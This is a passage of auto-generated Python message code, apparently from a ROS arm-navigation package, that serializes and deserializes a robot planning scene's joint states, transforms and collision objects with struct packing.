length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v120 = val1.shape
buff.write(_struct_b.pack(_v120.type))
length = len(_v120.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *_v120.dimensions))
length = len(_v120.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *_v120.triangles))
length = len(_v120.vertices)
buff.write(_struct_I.pack(length))
for val3 in _v120.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v121 = val1.pose_stamped
_v122 = _v121.header
buff.write(_struct_I.pack(_v122.seq))
_v123 = _v122.stamp
_x = _v123
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v122.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v124 = _v121.pose
_v125 = _v124.position
_x = _v125
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v126 = _v124.orientation
_x = _v126
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.link_names)
buff.write(_struct_I.pack(length))
for val2 in val1.link_names:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
buff.write(_struct_d.pack(val1.penetration_depth))
length = len(self.planning_scene.link_padding)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.link_padding:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_d.pack(val1.padding))
length = len(self.planning_scene.collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.collision_objects:
_v127 = val1.header
buff.write(_struct_I.pack(_v127.seq))
_v128 = _v127.stamp
_x = _v128
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v127.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(val1.padding))
_v129 = val1.operation
buff.write(_struct_b.pack(_v129.operation))
length = len(val1.shapes)
buff.write(_struct_I.pack(length))
for val2 in val1.shapes:
buff.write(_struct_b.pack(val2.type))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val2.dimensions))
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *val2.triangles))
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(val1.poses)
buff.write(_struct_I.pack(length))
for val2 in val1.poses:
_v130 = val2.position
_x = _v130
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v131 = val2.orientation
_x = _v131
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.attached_collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.attached_collision_objects:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v132 = val1.object
_v133 = _v132.header
buff.write(_struct_I.pack(_v133.seq))
_v134 = _v133.stamp
_x = _v134
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v133.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = _v132.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(_v132.padding))
_v135 = _v132.operation
buff.write(_struct_b.pack(_v135.operation))
length = len(_v132.shapes)
buff.write(_struct_I.pack(length))
for val3 in _v132.shapes:
buff.write(_struct_b.pack(val3.type))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *val3.dimensions))
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(struct.pack(pattern, *val3.triangles))
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(_v132.poses)
buff.write(_struct_I.pack(length))
for val3 in _v132.poses:
_v136 = val3.position
_x = _v136
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v137 = val3.orientation
_x = _v137
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.touch_links)
buff.write(_struct_I.pack(length))
for val2 in val1.touch_links:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
_x = self
buff.write(_struct_3I.pack(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs))
_x = self.planning_scene.collision_map.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene.collision_map.boxes)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.collision_map.boxes:
_v138 = val1.center
_x = _v138
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v139 = val1.extents
_x = _v139
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
_v140 = val1.axis
_x = _v140
buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))
buff.write(_struct_f.pack(val1.angle))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.planning_scene is None:
self.planning_scene = arm_navigation_msgs.msg.PlanningScene()
end = 0
_x = self
start = end
end += 12
(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.robot_state.joint_state.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.joint_state.name = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.joint_state.name.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.position = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.velocity = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.planning_scene.robot_state.joint_state.effort = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 8
(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.joint_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.joint_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses = []
for i in range(0, length):
val1 = geometry_msgs.msg.Pose()
_v141 = val1.position
_x = _v141
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v142 = val1.orientation
_x = _v142
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.robot_state.multi_dof_joint_state.poses.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms = []
for i in range(0, length):
val1 = geometry_msgs.msg.TransformStamped()
_v143 = val1.header
start = end
end += 4
(_v143.seq,) = _struct_I.unpack(str[start:end])
_v144 = _v143.stamp
_x = _v144
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v143.frame_id = str[start:end].decode('utf-8')
else:
_v143.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.child_frame_id = str[start:end].decode('utf-8')
else:
val1.child_frame_id = str[start:end]
_v145 = val1.transform
_v146 = _v145.translation
_x = _v146
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v147 = _v145.rotation
_x = _v147
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
self.planning_scene.fixed_frame_transforms.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8')
else:
val1 = str[start:end]
self.planning_scene.allowed_collision_matrix.link_names.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_collision_matrix.entries = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedCollisionEntry()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sB'%length
start = end
end += struct.calcsize(pattern)
val1.enabled = struct.unpack(pattern, str[start:end])
val1.enabled = map(bool, val1.enabled)
self.planning_scene.allowed_collision_matrix.entries.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.allowed_contacts = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AllowedContactSpecification()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.name = str[start:end].decode('utf-8')
else:
val1.name = str[start:end]
_v148 = val1.shape
start = end
end += 1
(_v148.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
_v148.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
_v148.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v148.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v148.vertices.append(val3)
_v149 = val1.pose_stamped
_v150 = _v149.header
start = end
end += 4
(_v150.seq,) = _struct_I.unpack(str[start:end])
_v151 = _v150.stamp
_x = _v151
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v150.frame_id = str[start:end].decode('utf-8')
else:
_v150.frame_id = str[start:end]
_v152 = _v149.pose
_v153 = _v152.position
_x = _v153
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v154 = _v152.orientation
_x = _v154
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.link_names = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.link_names.append(val2)
start = end
end += 8
(val1.penetration_depth,) = _struct_d.unpack(str[start:end])
self.planning_scene.allowed_contacts.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.link_padding = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.LinkPadding()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
start = end
end += 8
(val1.padding,) = _struct_d.unpack(str[start:end])
self.planning_scene.link_padding.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.CollisionObject()
_v155 = val1.header
start = end
end += 4
(_v155.seq,) = _struct_I.unpack(str[start:end])
_v156 = _v155.stamp
_x = _v156
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v155.frame_id = str[start:end].decode('utf-8')
else:
_v155.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.id = str[start:end].decode('utf-8')
else:
val1.id = str[start:end]
start = end
end += 4
(val1.padding,) = _struct_f.unpack(str[start:end])
_v157 = val1.operation
start = end
end += 1
(_v157.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.shapes = []
for i in range(0, length):
val2 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val2.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val2.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val2.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val2.vertices = []
for i in range(0, length):
val3 = geometry_msgs.msg.Point()
_x = val3
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val2.vertices.append(val3)
val1.shapes.append(val2)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.poses = []
for i in range(0, length):
val2 = geometry_msgs.msg.Pose()
_v158 = val2.position
_x = _v158
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v159 = val2.orientation
_x = _v159
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
val1.poses.append(val2)
self.planning_scene.collision_objects.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.attached_collision_objects = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.AttachedCollisionObject()
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1.link_name = str[start:end].decode('utf-8')
else:
val1.link_name = str[start:end]
_v160 = val1.object
_v161 = _v160.header
start = end
end += 4
(_v161.seq,) = _struct_I.unpack(str[start:end])
_v162 = _v161.stamp
_x = _v162
start = end
end += 8
(_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v161.frame_id = str[start:end].decode('utf-8')
else:
_v161.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
_v160.id = str[start:end].decode('utf-8')
else:
_v160.id = str[start:end]
start = end
end += 4
(_v160.padding,) = _struct_f.unpack(str[start:end])
_v163 = _v160.operation
start = end
end += 1
(_v163.operation,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v160.shapes = []
for i in range(0, length):
val3 = arm_navigation_msgs.msg.Shape()
start = end
end += 1
(val3.type,) = _struct_b.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
val3.dimensions = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
val3.triangles = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val3.vertices = []
for i in range(0, length):
val4 = geometry_msgs.msg.Point()
_x = val4
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
val3.vertices.append(val4)
_v160.shapes.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
_v160.poses = []
for i in range(0, length):
val3 = geometry_msgs.msg.Pose()
_v164 = val3.position
_x = _v164
start = end
end += 24
(_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])
_v165 = val3.orientation
_x = _v165
start = end
end += 32
(_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])
_v160.poses.append(val3)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
val1.touch_links = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val2 = str[start:end].decode('utf-8')
else:
val2 = str[start:end]
val1.touch_links.append(val2)
self.planning_scene.attached_collision_objects.append(val1)
_x = self
start = end
end += 12
(_x.planning_scene.collision_map.header.seq, _x.planning_scene.collision_map.header.stamp.secs, _x.planning_scene.collision_map.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.planning_scene.collision_map.header.frame_id = str[start:end].decode('utf-8')
else:
self.planning_scene.collision_map.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.planning_scene.collision_map.boxes = []
for i in range(0, length):
val1 = arm_navigation_msgs.msg.OrientedBoundingBox()
_v166 = val1.center
_x = _v166
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v167 = val1.extents
_x = _v167
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
_v168 = val1.axis
_x = _v168
start = end
end += 12
(_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])
start = end
end += 4
(val1.angle,) = _struct_f.unpack(str[start:end])
self.planning_scene.collision_map.boxes.append(val1)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.planning_scene.robot_state.joint_state.header.seq, _x.planning_scene.robot_state.joint_state.header.stamp.secs, _x.planning_scene.robot_state.joint_state.header.stamp.nsecs))
_x = self.planning_scene.robot_state.joint_state.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.planning_scene.robot_state.joint_state.name)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.joint_state.name:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.joint_state.position)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene.robot_state.joint_state.position.tostring())
length = len(self.planning_scene.robot_state.joint_state.velocity)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene.robot_state.joint_state.velocity.tostring())
length = len(self.planning_scene.robot_state.joint_state.effort)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.planning_scene.robot_state.joint_state.effort.tostring())
_x = self
buff.write(_struct_2I.pack(_x.planning_scene.robot_state.multi_dof_joint_state.stamp.secs, _x.planning_scene.robot_state.multi_dof_joint_state.stamp.nsecs))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.joint_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.joint_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.child_frame_ids:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.robot_state.multi_dof_joint_state.poses)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.robot_state.multi_dof_joint_state.poses:
_v169 = val1.position
_x = _v169
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v170 = val1.orientation
_x = _v170
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.fixed_frame_transforms)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.fixed_frame_transforms:
_v171 = val1.header
buff.write(_struct_I.pack(_v171.seq))
_v172 = _v171.stamp
_x = _v172
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v171.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.child_frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v173 = val1.transform
_v174 = _v173.translation
_x = _v174
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v175 = _v173.rotation
_x = _v175
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.allowed_collision_matrix.link_names)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_collision_matrix.link_names:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.pack('<I%ss'%length, length, val1))
length = len(self.planning_scene.allowed_collision_matrix.entries)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_collision_matrix.entries:
length = len(val1.enabled)
buff.write(_struct_I.pack(length))
pattern = '<%sB'%length
buff.write(val1.enabled.tostring())
length = len(self.planning_scene.allowed_contacts)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.allowed_contacts:
_x = val1.name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v176 = val1.shape
buff.write(_struct_b.pack(_v176.type))
length = len(_v176.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(_v176.dimensions.tostring())
length = len(_v176.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(_v176.triangles.tostring())
length = len(_v176.vertices)
buff.write(_struct_I.pack(length))
for val3 in _v176.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v177 = val1.pose_stamped
_v178 = _v177.header
buff.write(_struct_I.pack(_v178.seq))
_v179 = _v178.stamp
_x = _v179
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v178.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v180 = _v177.pose
_v181 = _v180.position
_x = _v181
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v182 = _v180.orientation
_x = _v182
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.link_names)
buff.write(_struct_I.pack(length))
for val2 in val1.link_names:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
buff.write(_struct_d.pack(val1.penetration_depth))
length = len(self.planning_scene.link_padding)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.link_padding:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_d.pack(val1.padding))
length = len(self.planning_scene.collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.collision_objects:
_v183 = val1.header
buff.write(_struct_I.pack(_v183.seq))
_v184 = _v183.stamp
_x = _v184
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v183.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = val1.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(val1.padding))
_v185 = val1.operation
buff.write(_struct_b.pack(_v185.operation))
length = len(val1.shapes)
buff.write(_struct_I.pack(length))
for val2 in val1.shapes:
buff.write(_struct_b.pack(val2.type))
length = len(val2.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val2.dimensions.tostring())
length = len(val2.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val2.triangles.tostring())
length = len(val2.vertices)
buff.write(_struct_I.pack(length))
for val3 in val2.vertices:
_x = val3
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(val1.poses)
buff.write(_struct_I.pack(length))
for val2 in val1.poses:
_v186 = val2.position
_x = _v186
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v187 = val2.orientation
_x = _v187
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(self.planning_scene.attached_collision_objects)
buff.write(_struct_I.pack(length))
for val1 in self.planning_scene.attached_collision_objects:
_x = val1.link_name
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_v188 = val1.object
_v189 = _v188.header
buff.write(_struct_I.pack(_v189.seq))
_v190 = _v189.stamp
_x = _v190
buff.write(_struct_2I.pack(_x.secs, _x.nsecs))
_x = _v189.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = _v188.id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
buff.write(struct.pack('<I%ss'%length, length, _x))
buff.write(_struct_f.pack(_v188.padding))
_v191 = _v188.operation
buff.write(_struct_b.pack(_v191.operation))
length = len(_v188.shapes)
buff.write(_struct_I.pack(length))
for val3 in _v188.shapes:
buff.write(_struct_b.pack(val3.type))
length = len(val3.dimensions)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(val3.dimensions.tostring())
length = len(val3.triangles)
buff.write(_struct_I.pack(length))
pattern = '<%si'%length
buff.write(val3.triangles.tostring())
length = len(val3.vertices)
buff.write(_struct_I.pack(length))
for val4 in val3.vertices:
_x = val4
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
length = len(_v188.poses)
buff.write(_struct_I.pack(length))
for val3 in _v188.poses:
_v192 = val3.position
_x = _v192
buff.write(_struct_3d.pack(_x.x, _x.y, _x.z))
_v193 = val3.orientation
_x = _v193
buff.write(_struct_4d.pack(_x.x, _x.y, _x.z, _x.w))
length = len(val1.touch_links)
buff.write(_struct_I.pack(length))
for val2 in val1.touch_links:
length = len(val2)
if python3 or type(val2) == unicode:
val2 = val2.encode('utf-8')
length = len(val2)
buff.write(struct.pack('<I%ss'%length, length, val2))
